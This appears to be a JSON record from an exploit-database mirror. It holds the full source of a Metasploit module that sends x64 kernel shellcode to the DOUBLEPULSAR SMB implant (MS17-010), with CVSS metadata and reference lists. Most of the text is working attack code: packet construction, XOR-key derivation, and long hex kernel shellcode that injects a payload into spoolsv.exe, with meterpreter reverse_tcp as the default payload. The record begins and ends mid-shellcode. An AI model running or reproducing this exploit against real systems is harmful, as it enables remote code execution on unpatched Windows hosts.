\"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-20] #"}, "lastseen": "2021-09-20T20:22:59", "differentElements": ["sourceData"], "edition": 20}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "436213826adc1a28e49a3aa4b64b27e1", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-09-21T00:18:31", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-29702"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:142603"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-21T00:18:31", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-21T00:18:31", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" 